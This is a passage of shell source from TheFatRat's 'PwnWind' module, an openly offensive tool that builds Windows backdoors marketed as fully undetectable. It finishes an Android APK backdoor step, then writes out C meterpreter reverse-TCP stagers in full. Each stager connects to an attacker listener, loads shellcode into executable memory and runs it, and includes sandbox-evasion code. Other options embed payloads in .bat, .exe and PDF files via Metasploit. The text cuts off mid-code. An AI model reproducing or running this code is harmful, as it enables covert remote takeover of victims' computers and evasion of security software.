[[ ! -f "temp/backand.apk" ]] -then -echo "MSFVenom was unable to embed a payload on your apk" -echo "" -echo -n "Press ENTER key to return to menu" -read rsp -rm -rf temp/* > /dev/null 2>&1 -clear && menu -fi - -ren=`shuf -i 1-1000 -n 1` -back=$output/app_backdoored.apk -if [ -f "$back" ] -then -mv $output/app_backdoored.apk $output/app_backdoored_$ren.apk >>$log 2>&1 -echo -e $yellow "" -echo "[!] FatRat Detected that you already had a previous created backdoor -file in ($output/) with the name app_backdoored.apk ." -echo -e $okegreen "" -echo "[✔] FatRat have renamed your old backdoor to app_backdoored_$ren.apk" - -# Moving apk backdoor to final destination -mv $path/temp/backand.apk $output/app_backdoored.apk >>$log 2>&1 - -# Removing temp files -rm -rf temp/* > /dev/null 2>&1 -crlst -else - - -# Moving apk backdoor to final destination -mv $path/temp/backand.apk $output/app_backdoored.apk >>$log 2>&1 -rm -rf temp/* > /dev/null 2>&1 -echo "" -echo "Your backdoored apk can be found in : $output/app_backdoored.apk" -echo "" -crlst -fi -echo "Your backdoored apk can be found in : $output/app_backdoored.apk" -echo "" -crlst -;; -esac -} - -########################################################### -#PwnWind v1.5 -#Developed Edo Maland (Screetsec) -#thanks astro give reference -############################################################ -############################################################ -function PwnWinds() { -clear -echo "" -echo "" -echo -e $cyan" [ Select an Option To Begin >>" -echo "" -echo -e $lightgreen" ________ ___ ______ _________ "; -echo " ___ __ \__ __________ | / /__(_)____________ /_______"; -echo " __ /_/ /_ | /| / /_ __ \_ | /| / /__ /__ __ \ __ /__ ___/"; -echo " _ ____/__ |/ |/ /_ / / /_ |/ |/ / _ / _ / / / /_/ / _(__ ) "; -echo " /_/ ____/|__/ /_/ /_/____/|__/ /_/ /_/ /_/\__,_/ /____/ "; -echo "" -echo -e $cyan" ______ " -echo " .- -. " -echo " / \ " -echo " |, .-. .-. ,| " -echo " | )(_ / \_ )( |" -echo " |/ /\ \| " -echo -e $red" $yellow (@_ $cyan <__ ^^ __> " -echo -e $red" _ ) \_______$cyan""\__|IIIIII|__/$red""____________________ " -echo -e $red" (_)$yellow\@8@8{}<$red""________________________________________$yellow> " -echo -e $red" )_/ $cyan \ IIIIII / " -echo -e $red" $yellow (@ $cyan -------- " -echo -e $cyan" PwnWind Version $red v1.5 " -echo -e $cyan" Pwned Windows with backdoor" -echo -e " Author : $red""Edo Maland (Screetsec)" -echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platform "; - echo "" - echo -e $yellow" [1] $okegreen Create a bat file+Powershell (FUD 100%)" - echo -e $yellow" [2] $okegreen Create exe file with C# + Powershell (FUD 100%) " - echo -e $yellow" [3] $okegreen Create exe file with apache + Powershell (FUD 100%)" - echo -e $yellow" [4] $okegreen Create exe file with C + Powershell (FUD 98 %)" - echo -e $yellow" [5] $okegreen Create Backdoor with C + Powershell + Embed Pdf (FUD 80%)" - echo -e $yellow" [6] $okegreen Create Backdoor with C / Meteperter_reverse_tcp (FUD 97%)" - echo -e $yellow" [7] $okegreen Create Backdoor with C / Metasploit Staging Protocol (FUD 98%)" - echo -e $yellow" [8] $okegreen Create Backdoor with C to dll ( custom dll inject )" - echo -e $yellow" [9] $okegreen Back to Menu " - echo -e $yellow" " - echo -e $okegreen" ┌─["$red"TheFatRat$okegreen]──[$red~$okegreen]─["$yellow"pwnwind$okegreen]:" - echo -ne $okegreen" └─────► " ;tput sgr0 - read fatrat1 - - case $fatrat1 in -1) - echo "" - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" -if [ ! -f "$defcon" ] -then -yourip="" -yourport="" -fi - echo -e $okegreen "" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 - read fira -invalid -if [ $err == "1" ] -then -echo -e $okegreen "" -echo -n "Press [ENTER] key to return to menu ." -read inp -PwnWinds -fi -pldwin -spinlong - echo "" - echo "" - gboor - spinlong - echo "" - $dave $payload $yourip $yourport > /dev/null 2>&1 - echo "" - echo "" - cat powershell_attack.txt - sleep 2 - rm unicorn.rc - mv powershell_attack.txt $output/$fira.bat - echo "" - echo -e $okegreen"" - if [[ -f "$output/$fira.bat" ]] - then - echo -e "$okegreen""Backdoor Saved To : $output/$fira.bat" - else - echo -e "$red""There was an error creating the baackdoor" - fi - echo "" - echo -ne "$yellow"" Press [ENTER] to continue ......... " - read continue - -PwnWinds -;; -2) - echo "" - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - echo -e $okegreen "" -if [ ! -f "$defcon" ] -then -yourip="" -yourport="" -fi - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 - read fira -invalid -if [ $err == "1" ] -then -echo -e $okegreen "" -echo -n "Press [ENTER] key to return to menu ." -read inp -PwnWinds -fi -pldwin -spinlong - echo "" - echo "" - gboor - spinlong - echo "" - $pwned $payload $yourip $yourport > /dev/null 2>&1 - echo "" - echo "" - #rm tmp source - s0=$(cat powershell_attack.txt | cut -d ' ' -f1) - s1=$(cat powershell_attack.txt | cut -d ' ' -f2) - s2=$(cat powershell_attack.txt | cut -d ' ' -f3) - s3=$(cat powershell_attack.txt | cut -d ' ' -f4) - s4=$(cat powershell_attack.txt | cut -d ' ' -f5) - rm $bcom > /dev/null 2>&1 - sed s/PAYLOAD/$s0\ $s1\ $s2\ $s3\ $s4/g $B > $bcom - echo - echo - cat $bcom - echo;spinlong;echo - sleep 1 - echo - mcs $bcom -o "$output/$fira.exe" > /dev/null 2>&1 - rm unicorn.rc powershell_attack.txt - echo "" - if [[ -f "$output/$fira.exe" ]] - then - echo -e "$okegreen""Backdoor Saved To : $output/$fira.exe" - else - echo -e "$red""There was an error creating the backdoor" - fi - echo "" - echo -ne "$yellow"" Press [ENTER] to continue ......... " - read continue - -PwnWinds - - -;; -3) - echo "" - echo -e $okegreen"" - echo -e $okegreen " Starting Apache Server wait ..." - /etc/init.d/apache2 start > /dev/null 2>&1 - echo "" - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" -if [ ! -f "$defcon" ] -then -yourip="" -yourport="" -fi - echo -e $okegreen "" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 - read fira -invalid -if [ $err == "1" ] -then -echo -e $okegreen "" -echo -n "Press [ENTER] key to return to menu ." -read inp -PwnWinds -fi -pldwin -spinlong - echo "" - echo "" - gboor - spinlong - echo "" - $pwned $payload $yourip $yourport > /dev/null 2>&1 - echo "" - echo $yourip >> "$out" - - s0=$(cat $out | cut -d ' ' -f1) - - sed s/SERVER/$s0/g $apache > $apachecom - echo - $COMPILER -Wall -mwindows $apachecom -o "$output/$fira.exe" > /dev/null 2>&1 - rm unicorn.rc $apachecom $out - mv powershell_attack.txt $apache2 - sleep 2 - echo "" - if [[ -f "$output/$fira.exe" ]] - then - echo -e "$okegreen""Backdoor Saved To : $output/$fira.exe" - else - echo -e "$red""There was an error creating the backdoor" - fi - echo "" - echo -ne "$yellow"" Press [ENTER] to continue ......... " - read continue - PwnWinds - -;; -4) - echo "" - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" -if [ ! -f "$defcon" ] -then -yourip="" -yourport="" -fi - echo -e $okegreen "" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 - read fira -invalid -if [ $err == "1" ] -then -echo -e $okegreen "" -echo -n "Press [ENTER] key to return to menu ." -read inp -PwnWinds -fi -pldwin -spinlong - echo "" - echo "" - gboor - spinlong - echo "" - $pwned $payload $yourip $yourport > /dev/null 2>&1 - echo "" - echo "" - - s0=$(cat powershell_attack.txt | cut -d ' ' -f1) - s1=$(cat powershell_attack.txt | cut -d ' ' -f2) - s2=$(cat powershell_attack.txt | cut -d ' ' -f3) - s3=$(cat powershell_attack.txt | cut -d ' ' -f4) - s4=$(cat powershell_attack.txt | cut -d ' ' -f5) - - sed s/PAYLOAD/$s0\ $s1\ $s2\ $s3\ $s4/g $C > $paycom - echo - $COMPILER -Wall -mwindows $paycom -o "$output/$fira.exe" > /dev/null 2>&1 - rm unicorn.rc powershell_attack.txt $paycom - sleep 2 - echo "" - if [[ -f "$output/$fira.exe" ]] - then - echo -e "$okegreen""Backdoor Saved To : $output/$fira.exe" - else - echo -e "$red""There was an error creating the backdoor" - fi - echo "" - echo -ne "$yellow"" Press [ENTER] to continue ......... " - read continue - PwnWinds - -;; -5) - echo - echo -e $yellow" Worked on Adobe Reader v8.x, v9.x / Windows XP SP3 / Windows 7/Vista ( English )" - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" -if [ ! -f "$defcon" ] -then -yourip="" -yourport="" -fi - echo -e $okegreen "" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 - read fira -invalid -if [ $err == "1" ] -then -echo -e $okegreen "" -echo -n "Press [ENTER] key to return to menu ." -read inp -PwnWinds -fi - echo "" - echo -ne $okegreen " Located Original PDF file for embed (example:/TheFatRat/PE/original.pdf) :" ;tput sgr0 - read embedpdf -if [[ -z "$embedpdf" ]]; then -embedpdf="$path/PE/original.pdf" -fi -pldwin - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - $pwned $payload $yourip $yourport > /dev/null 2>&1 - echo "" - echo "" - - s0=$(cat powershell_attack.txt | cut -d ' ' -f1) - s1=$(cat powershell_attack.txt | cut -d ' ' -f2) - s2=$(cat powershell_attack.txt | cut -d ' ' -f3) - s3=$(cat powershell_attack.txt | cut -d ' ' -f4) - s4=$(cat powershell_attack.txt | cut -d ' ' -f5) - - sed s/PAYLOAD/$s0\ $s1\ $s2\ $s3\ $s4/g $C > $pdfcom - echo - $COMPILER -Wall -mwindows $pdfcom -o "$output/backdoor_for_pdf.exe" > /dev/null 2>&1 - sleep 2 - echo " Wait for embed exe to pdf .... " - xterm -T " TheFatRat < PDF BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use windows/fileformat/adobe_pdf_embedded_exe; set EXE::Custom $output/backdoor_for_pdf.exe; set FILENAME $fira.pdf; set INFILENAME $embedpdf; exploit; exit -y'" > /dev/null 2>&1 - echo "" - mv ~/.msf4/local/$fira.pdf $output/$fira.pdf - rm unicorn.rc > /dev/null 2>&1 - rm powershell_attack.txt > /dev/null 2>&1 - if [[ -f "$output/$fira.pdf" ]] - then - echo -e "$okegreen""Backdoor PDF Saved To : $output/$fira.pdf" - else - echo -e "$red""There was an error creating the backdoor" - fi - echo "" - echo -ne "$yellow"" Press [ENTER] to continue ......... " - read continue - PwnWinds - -;; -6) - echo "" - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" -if [ ! -f "$defcon" ] -then -yourip="" -yourport="" -fi - echo -e $okegreen "" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 - read fira -invalid -if [ $err == "1" ] -then -echo -e $okegreen "" -echo -n "Press [ENTER] key to return to menu ." -read inp -PwnWinds -fi - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - echo '#include ' > $reverse1 - echo '#include ' >> $reverse1 - echo '#include ' >> $reverse1 - echo '#include ' >> $reverse1 - echo 'void winsock_init();' >> $reverse1 - echo 'void Kick(SOCKET my_socket, char * error);' >> $reverse1 - echo 'void genlol();' >> $reverse1 - echo 'int recv_all(SOCKET my_socket, void * buffer, int len);' >> $reverse1 - echo 'SOCKET wsconnect(char * targetip, int port);' >> $reverse1 - echo 'int random_in_range (unsigned int min, unsigned int max);' >> $reverse1 - echo 'char* rev(char* str);' >> $reverse1 - echo 'int sandbox_evasion();' >> $reverse1 - echo 'inline void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort);' >> $reverse1 - echo 'void winsock_init() {' >> $reverse1 - echo ' WSADATA wsaData;' >> $reverse1 - echo ' WORD wVersionRequested;' >> $reverse1 - echo ' wVersionRequested = MAKEWORD(2, 2);' >> $reverse1 - echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> $reverse1 - echo ' printf("ws2_32.dll is out of date.\n");' >> $reverse1 - echo ' WSACleanup();' >> $reverse1 - echo ' exit(1);' >> $reverse1 - echo ' }' >> $reverse1 - echo '}' >> $reverse1 - echo 'void Kick(SOCKET my_socket, char * error) {' >> $reverse1 - echo ' printf("error: %s\n", error);' >> $reverse1 - echo ' closesocket(my_socket);' >> $reverse1 - echo ' WSACleanup();' >> $reverse1 - echo ' exit(1);' >> $reverse1 - echo ' }' >> $reverse1 - echo 'void genlol(){' >> $reverse1 - echo ' int num1, num2, num3;' >> $reverse1 - echo ' num1=100;' >> $reverse1 - echo ' while (num1<=5) {' >> $reverse1 - echo ' num1=random_in_range(0,10000);' >> $reverse1 - echo ' num2=random_in_range(0,10000);' >> $reverse1 - echo ' num3=random_in_range(0,10000);' >> $reverse1 - echo ' }' >> $reverse1 - echo '}' >> $reverse1 - echo 'int recv_all(SOCKET my_socket, void * buffer, int len) {' >> $reverse1 - echo ' int tret = 0;' >> $reverse1 - echo ' int nret = 0;' >> $reverse1 - echo ' void * startb = buffer;' >> $reverse1 - echo ' while (tret < len) {' >> $reverse1 - echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);' >> $reverse1 - echo ' startb += nret;' >> $reverse1 - echo ' tret += nret;' >> $reverse1 - echo ' if (nret == SOCKET_ERROR)' >> $reverse1 - echo ' Kick(my_socket, "Could not receive data");' >> $reverse1 - echo ' }' >> $reverse1 - echo ' return tret;' >> $reverse1 - echo '}' >> $reverse1 - echo 'SOCKET wsconnect(char * targetip, int port) {' >> $reverse1 - echo ' struct hostent * target;' >> $reverse1 - echo ' struct sockaddr_in sock;' >> $reverse1 - echo ' SOCKET my_socket;' >> $reverse1 - echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);' >> $reverse1 - echo ' if (my_socket == INVALID_SOCKET)' >> $reverse1 - echo ' Kick(my_socket, "Cannot initialize socket");' >> $reverse1 - echo ' target = gethostbyname(targetip);' >> $reverse1 - echo ' if (target == NULL)' >> $reverse1 - echo ' Kick(my_socket, "cannot resolve target");' >> $reverse1 - echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);' >> $reverse1 - echo ' sock.sin_family = AF_INET;' >> $reverse1 - echo ' sock.sin_port = htons(port);' >> $reverse1 - echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )' >> $reverse1 - echo ' Kick(my_socket, "Could not connect");' >> $reverse1 - echo ' return my_socket;' >> $reverse1 - echo '}' >> $reverse1 - echo 'int random_in_range (unsigned int min, unsigned int max)' >> $reverse1 - echo '{' >> $reverse1 - echo ' int base_random = rand(); ' >> $reverse1 - echo ' if (RAND_MAX == base_random){' >> $reverse1 - echo ' return random_in_range(min, max);' >> $reverse1 - echo ' }' >> $reverse1 - echo ' int range = max - min,' >> $reverse1 - echo ' remainder = RAND_MAX % range,' >> $reverse1 - echo ' bucket = RAND_MAX / range;' >> $reverse1 - echo ' if (base_random < RAND_MAX - remainder) {' >> $reverse1 - echo ' return min + base_random/bucket;' >> $reverse1 - echo ' } else {' >> $reverse1 - echo ' return random_in_range (min, max);' >> $reverse1 - echo ' }' >> $reverse1 - echo '}' >> $reverse1 - echo 'char* rev(char* str)' >> $reverse1 - echo '{' >> $reverse1 - echo ' int end=strlen(str)-1;' >> $reverse1 - echo ' int i;' >> $reverse1 - echo ' for(i=5; i> $reverse1 - echo ' {' >> $reverse1 - echo ' str[i] ^= 1;' >> $reverse1 - echo ' }' >> $reverse1 - echo ' return str;' >> $reverse1 - echo '}' >> $reverse1 - echo 'int sandbox_evasion(){' >> $reverse1 - echo ' MSG msg;' >> $reverse1 - echo ' DWORD tc;' >> $reverse1 - echo ' PostThreadMessage(GetCurrentThreadId(), WM_USER + 2, 23, 42);' >> $reverse1 - echo ' if (!PeekMessage(&msg, (HWND)-1, 0, 0, 0))' >> $reverse1 - echo ' return -1;' >> $reverse1 - echo ' if (msg.message != WM_USER+2 || msg.wParam != 23 || msg.lParam != 42)' >> $reverse1 - echo ' return -1;' >> $reverse1 - echo ' tc = GetTickCount();' >> $reverse1 - echo ' Sleep(650);' >> $reverse1 - echo ' if (((GetTickCount() - tc) / 300) != 2)' >> $reverse1 - echo ' return -1;' >> $reverse1 - echo ' return 0;' >> $reverse1 - echo '}' >> $reverse1 - echo 'void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort){' >> $reverse1 - echo ' ULONG32 size;' >> $reverse1 - echo ' char * buffer;' >> $reverse1 - echo ' void (*function)();' >> $reverse1 - echo ' winsock_init();' >> $reverse1 - echo ' SOCKET my_socket = wsconnect(listenerIP, listenerPort);' >> $reverse1 - echo ' int count = recv(my_socket, (char *)&size, 4, 0);' >> $reverse1 - echo ' if (count != 4 || size <= 0)' >> $reverse1 - echo ' Kick(my_socket, "bad length value\n");' >> $reverse1 - echo ' genlol();' >> $reverse1 - echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);' >> $reverse1 - echo ' genlol();' >> $reverse1 - echo ' if (buffer == NULL)' >> $reverse1 - echo ' Kick(my_socket, "bad buffer\n");' >> $reverse1 - echo ' buffer[0] = 0xBF;' >> $reverse1 - echo ' genlol();' >> $reverse1 - echo ' memcpy(buffer + 1, &my_socket, 4);' >> $reverse1 - echo ' genlol();' >> $reverse1 - echo ' count = recv_all(my_socket, buffer + 5, size);' >> $reverse1 - echo ' function = (void (*)())buffer;' >> $reverse1 - echo ' function();' >> $reverse1 - echo '}' >> $reverse1 - echo 'void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){' >> $reverse1 - echo ' ULONG32 size;' >> $reverse1 - echo ' char * buffer;' >> $reverse1 - echo ' void (*function)();' >> $reverse1 - echo ' winsock_init();' >> $reverse1 - echo ' SOCKET my_socket = wsconnect(listenerIP, listenerPort);' >> $reverse1 - echo ' int count = recv(my_socket, (char *)&size, 4, 0);' >> $reverse1 - echo ' if (count != 4 || size <= 0)' >> $reverse1 - echo ' Kick(my_socket, "bad length value\n");' >> $reverse1 - echo ' genlol();' >> $reverse1 - echo ' buffer = VirtualAlloc(0, size + 10, MEM_COMMIT, PAGE_EXECUTE_READWRITE);' >> $reverse1 - echo ' genlol();' >> $reverse1 - echo ' if (buffer == NULL)' >> $reverse1 - echo ' Kick(my_socket, "bad buffer\n");' >> $reverse1 - echo ' buffer[0] = 0x48;' >> $reverse1 - echo ' buffer[1] = 0xBF;' >> $reverse1 - echo ' genlol();' >> $reverse1 - echo ' memcpy(buffer + 2, &my_socket, 8);' >> $reverse1 - echo ' genlol();' >> $reverse1 - echo ' count = recv_all(my_socket, buffer + 10, size);' >> $reverse1 - echo ' function = (void (*)())buffer;' >> $reverse1 - echo ' function();' >> $reverse1 - echo '}' >> $reverse1 - echo 'int main(int argc, char *argv[]) {' >> $reverse1 - echo -n 'char * defaultListenerIP = "' >> $reverse1 - echo -n $yourip >> $reverse1 - echo -n '";' >> $reverse1 - echo '' >> $reverse1 - echo -n 'unsigned int defaultListenerPort = ' >> $reverse1 - echo -n $yourport >> $reverse1 - echo -n ';' >> $reverse1 - echo '' >> $reverse1 - echo ' sandbox_evasion();' >> $reverse1 - echo ' if(argc == 3){' >> $reverse1 - echo ' #ifdef ISX64' >> $reverse1 - echo ' reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2]));' >> $reverse1 - echo ' #else' >> $reverse1 - echo ' reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2]));' >> $reverse1 - echo ' #endif' >> $reverse1 - echo ' }else{' >> $reverse1 - echo ' #ifdef ISX64' >> $reverse1 - echo ' reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort);' >> $reverse1 - echo ' #else' >> $reverse1 - echo ' reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort);' >> $reverse1 - echo ' #endif' >> $reverse1 - echo ' }' >> $reverse1 - echo ' return 0;' >> $reverse1 - echo '}' >> $reverse1 - $COMPILER $reverse1 -o $output/$fira.exe -lws2_32 -mwindows - echo - echo -e $yellow " [+]"$okegreen"Compiling Binary Done ";tput sgr0 - rm $reverse1 - if [[ -f "$output/$fira.exe" ]] - then - echo -e "$okegreen""Backdoor Saved To : $output/$fira.exe" - else - echo -e "$red""There was an error creating the backdoor" - fi - echo "" - echo -ne "$yellow"" Press [ENTER] to continue ......... " - read continue - PwnWinds - -;; -7) - echo "" - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" -if [ ! -f "$defcon" ] -then -yourip="" -yourport="" -fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 - read fira -invalid -if [ $err == "1" ] -then -echo -e $okegreen "" -echo -n "Press [ENTER] key to return to menu ." -read inp -PwnWinds -fi - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - echo '#include '> $stag - echo '#include ' >> $stag - echo '#include ' >> $stag - echo '#include ' >> $stag - echo -n 'unsigned char server[]="' >> $stag - echo -n $yourip >> $stag - echo -n '";' >> $stag - echo '' >> $stag - echo -n 'unsigned char serverp[]="' >> $stag - echo -n $yourport >> $stag - echo -n '";' >> $stag - echo '' >> $stag - echo 'void winsock_init() {' >> $stag - echo ' WSADATA wsaData;' >> $stag - echo ' WORD wVersionRequested;' >> $stag - echo ' wVersionRequested = MAKEWORD(2, 2);'>> $stag - echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> $stag - echo ' printf("ws2_32.dll is out of date.\n"); '>> $stag - echo ' WSACleanup(); '>> $stag - echo ' exit(1);'>> $stag - echo ' }' >> $stag - echo ' }' >> $stag - echo ' void punt(SOCKET my_socket, char * error) {' >> $stag - echo ' printf("Bad things: %s\n", error);'>> $stag - echo ' closesocket(my_socket);'>> $stag - echo ' WSACleanup();'>> $stag - echo ' exit(1);' >> $stag - echo ' }' >> $stag - echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> $stag - echo ' int tret = 0;'>> $stag - echo ' int nret = 0;'>>$stag - echo ' void * startb = buffer;'>> $stag - echo ' while (tret < len) {'>>$stag - echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> $stag - echo ' startb += nret;'>> $stag - echo ' tret += nret;'>>$stag - echo ' if (nret == SOCKET_ERROR)'>> $stag - echo ' punt(my_socket, "Could not receive data");'>> $stag - echo ' }'>>$stag - echo ' return tret;'>> $stag - echo '}' >> $stag - echo 'SOCKET wsconnect(char * targetip, int port) {'>> $stag - echo ' struct hostent * target;' >> $stag - echo ' struct sockaddr_in sock;' >> $stag - echo ' SOCKET my_socket;'>>$stag - echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> $stag - echo ' if (my_socket == INVALID_SOCKET)'>> $stag - echo ' punt(my_socket, ".");'>>$stag - echo ' target = gethostbyname(targetip);'>>$stag - echo ' if (target == NULL)'>>$stag - echo ' punt(my_socket, "..");'>>$stag - echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>$stag - echo ' sock.sin_family = AF_INET;'>> $stag - echo ' sock.sin_port = htons(port);'>>$stag - echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>$stag - echo ' punt(my_socket, "...");'>>$stag - echo ' return my_socket;'>>$stag - echo '}' >> $stag - echo 'int main(int argc, char * argv[]) {' >> $stag - echo ' FreeConsole();'>>$stag - echo ' ULONG32 size;'>>$stag - echo ' char * buffer;'>>$stag - echo ' void (*function)();'>>$stag - echo ' winsock_init();'>> $stag - echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>>$stag - echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>$stag - echo ' if (count != 4 || size <= 0)'>>$stag - echo ' punt(my_socket, "read a strange or incomplete length value\n");'>>$stag - echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>$stag - echo ' if (buffer == NULL)'>>$stag - echo ' punt(my_socket, "could not allocate buffer\n");'>>$stag - echo ' buffer[0] = 0xBF;'>>$stag - echo ' memcpy(buffer + 1, &my_socket, 4);'>>$stag - echo ' count = recv_all(my_socket, buffer + 5, size);'>>$stag - echo ' function = (void (*)())buffer;'>>$stag - echo ' function();'>>$stag - echo ' return 0;'>>$stag - echo '}' >> $stag - $COMPILER $stag -o $output/$fira.exe -lws2_32 - echo - echo -e $yellow " [+]"$okegreen"Compiling Binary Done ";tput sgr0 - rm $stag -if [[ -f "$output/$fira.exe" ]] - then - echo -e "$okegreen""Backdoor Saved To : $output/$fira.exe" - else - echo -e "$red""There was an error creating the backdoor" - fi - echo "" - echo -ne "$yellow"" Press [ENTER] to continue ......... " - read continue - PwnWinds - -;; - - -8) - echo "" - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" -if [ ! -f "$defcon" ] -then -yourip="" -yourport="" -fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 - read fira -invalid -if [ $err == "1" ] -then -echo -e $okegreen "" -echo -n "Press [ENTER] key to return to menu ." -read inp -PwnWinds -fi - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - echo '#include '> $dllcustom - echo '#include ' >> $dllcustom - echo '#include ' >> $dllcustom - echo '#include ' >> $dllcustom - echo -n 'unsigned char server[]="' >> $dllcustom - echo -n $yourip >> $dllcustom - echo -n '";' >> $dllcustom - echo '' >> $dllcustom - echo -n 'unsigned char serverp[]="' >> $dllcustom - echo -n $yourport >> $dllcustom - echo -n '";' >> $dllcustom - echo '' >> $dllcustom - echo 'void winsock_init() {' >> $dllcustom - echo ' WSADATA wsaData;' >> $dllcustom - echo ' WORD wVersionRequested;' >> $dllcustom - echo ' wVersionRequested = MAKEWORD(2, 2);'>> $dllcustom - echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> $dllcustom - echo ' printf("bad\n"); '>> $dllcustom - echo ' WSACleanup(); '>> $dllcustom - echo ' exit(1);'>> $dllcustom - echo ' }' >> $dllcustom - echo ' }' >> $dllcustom - echo ' void punt(SOCKET my_socket, char * error) {' >> $dllcustom - echo ' printf("r %s\n", error);'>> $dllcustom - echo ' closesocket(my_socket);'>> $dllcustom - echo ' WSACleanup();'>> $dllcustom - echo ' exit(1);' >> $dllcustom - echo ' }' >> $dllcustom - echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> $dllcustom - echo ' int tret = 0;'>> $dllcustom - echo ' int nret = 0;'>> $dllcustom - echo ' void * startb = buffer;'>> $dllcustom - echo ' while (tret < len) {'>>$dllcustom - echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> $dllcustom - echo ' startb += nret;'>> $dllcustom - echo ' tret += nret;'>> $dllcustom - echo ' if (nret == SOCKET_ERROR)'>> $dllcustom - echo ' punt(my_socket, "no data");'>> $dllcustom - echo ' }'>> $dllcustom - echo ' return tret;'>> $dllcustom - echo '}' >> $dllcustom - echo 'SOCKET wsconnect(char * targetip, int port) {'>> $dllcustom - echo ' struct hostent * target;' >> $dllcustom - echo ' struct sockaddr_in sock;' >> $dllcustom - echo ' SOCKET my_socket;'>> $dllcustom - echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> $dllcustom - echo ' if (my_socket == INVALID_SOCKET)'>> $dllcustom - echo ' 